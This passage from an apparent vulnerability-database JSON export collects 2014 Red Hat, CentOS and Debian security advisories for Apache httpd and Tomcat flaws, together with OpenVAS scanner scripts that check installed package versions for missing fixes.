(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nIt was found that several application-provided XML files, such as web.xml,\ncontent.xml, *.tld, *.tagx, and *.jspx, resolved external entities,\npermitting XML External Entity (XXE) attacks. An attacker able to deploy\nmalicious applications to Tomcat could use this flaw to circumvent security\nrestrictions set by the JSM, and gain access to sensitive information on\nthe system. 
Note that this flaw only affected deployments in which Tomcat\nis running applications from untrusted sources, such as in a shared hosting\nenvironment. (CVE-2013-4590)\n\nIt was found that, in certain circumstances, it was possible for a\nmalicious web application to replace the XML parsers used by Tomcat to\nprocess XSLTs for the default servlet, JSP documents, tag library\ndescriptors (TLDs), and tag plug-in configuration files. The injected XML\nparser(s) could then bypass the limits imposed on XML external entities\nand/or gain access to the XML files processed for other web applications\ndeployed on the same Tomcat instance. (CVE-2014-0119)\n\nAll users of Red Hat JBoss Web Server 2.0.1 on Red Hat Enterprise Linux 6\nare advised to upgrade to Red Hat JBoss Web Server 2.1.0. The JBoss server\nprocess must be restarted for this update to take effect.", "modified": "2018-06-07T02:42:48", "published": "2014-08-21T19:24:12", "id": "RHSA-2014:1087", "href": "https://access.redhat.com/errata/RHSA-2014:1087", "type": "redhat", "title": "(RHSA-2014:1087) Important: Red Hat JBoss Web Server 2.1.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2020-07-17T03:31:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0920\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. 
(CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/032478.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/032479.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0920.html", "edition": 5, "modified": "2014-07-23T15:13:08", "published": "2014-07-23T15:12:33", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/032478.html", "id": "CESA-2014:0920", "title": "httpd, mod_ssl security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:25:43", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-4352", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0921\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. 
A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd module.\nA malicious HTTP server could cause the httpd child process to crash when\nthe Apache HTTP Server was used as a forward proxy with caching.\n(CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A remote\nattacker could send a specially crafted request to a server configured as a\nreverse proxy using a threaded Multi-Processing Modules (MPM) that would\ncause the httpd child process to crash. (CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/032480.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ldap\nmod_proxy_html\nmod_session\nmod_ssl\n\n**Upstream details at:**\n", "edition": 3, "modified": "2014-07-23T15:36:55", "published": "2014-07-23T15:36:55", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/032480.html", "id": "CESA-2014:0921", "title": "httpd, mod_ldap, mod_proxy_html, mod_session, mod_ssl security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T00:51:20", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2989-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJuly 24, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nCVE ID : CVE-2014-0118 CVE-2014-0226 CVE-2014-0231\n\nSeveral security issues were found in the Apache HTTP server.\n\nCVE-2014-0118\n\n The DEFLATE input filter (inflates request bodies) in mod_deflate\n allows remote attackers to cause a denial of service (resource\n consumption) via crafted request data that decompresses to a much\n larger size.\n\nCVE-2014-0226\n\n A race condition was found in mod_status. An attacker able to\n access a public server status page on a server could send carefully\n crafted requests which could lead to a heap buffer overflow,\n causing denial of service, disclosure of sensitive information, or\n potentially the execution of arbitrary code.\n\nCVE-2014-0231\n\n A flaw was found in mod_cgid. 
If a server using mod_cgid hosted\n CGI scripts which did not consume standard input, a remote attacker\n could cause child processes to hang indefinitely, leading to denial\n of service.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 2.2.22-13+deb7u3.\n\nFor the testing distribution (jessie), these problems will be fixed in\nversion 2.4.10-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.4.10-1.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2014-07-24T22:20:03", "published": "2014-07-24T22:20:03", "id": "DEBIAN:DSA-2989-1:7BF7C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00171.html", "title": "[SECURITY] [DSA 2989-1] apache2 security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:18:00", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-6438", "CVE-2014-0118", "CVE-2014-0226"], "description": "Package : apache2\nVersion : 2.2.16-6+squeeze13\nCVE ID : CVE-2013-6438 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231\n\nCVE-2014-0231: prevent denial of service in mod_cgid.\nCVE-2014-0226: prevent denial of service via race in mod_status.\nCVE-2014-0118: fix resource consumption via mod_deflate body decompression.\nCVE-2013-6438: prevent denial of service via mod_dav incorrect end of string\n", "edition": 11, "modified": "2014-09-29T13:41:46", "published": "2014-09-29T13:41:46", "id": "DEBIAN:DLA-66-1:F105A", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201409/msg00023.html", "title": "[SECURITY] [DLA 66-1] apache2 security update", "type": "debian", 
"cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:37:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310881972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881972", "type": "openvas", "title": "CentOS Update for httpd CESA-2014:0920 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2014:0920 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881972\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:34:43 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for httpd CESA-2014:0920 centos5\");\n\n script_tag(name:\"affected\", value:\"httpd on CentOS 5\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the 'DEFLATE' input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. 
(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0920\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-July/020440.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~87.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:00:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120103", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-388)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120103\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:17:29 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-388)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the Apache HTTP server. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-388.html\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.27~1.3.amzn1\", rls:\"AMAZON\"))) 
{\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.27~1.3.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.27~1.3.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.27~1.3.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.27~1.3.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310881968", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881968", "type": "openvas", "title": "CentOS Update for httpd CESA-2014:0920 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2014:0920 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881968\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:31:47 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for httpd CESA-2014:0920 centos6\");\n\n script_tag(name:\"affected\", value:\"httpd on CentOS 6\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the 'DEFLATE' input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. 
(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0920\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-July/020441.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~31.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-07-28T00:00:00", "id": "OPENVAS:1361412562310871203", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871203", "type": "openvas", "title": "RedHat Update for httpd RHSA-2014:0920-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2014:0920-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871203\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-28 16:42:09 +0530 (Mon, 28 Jul 2014)\");\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for httpd RHSA-2014:0920-01\");\n\n\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the 'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the 'DEFLATE' input\nfilter). 
A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0920-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-July/msg00046.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(6|5)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~31.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~87.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "Several security issues were found in the Apache HTTP server.\n\nCVE-2014-0118\nThe DEFLATE input filter (inflates request bodies) in mod_deflate\nallows remote attackers to cause a denial of service 
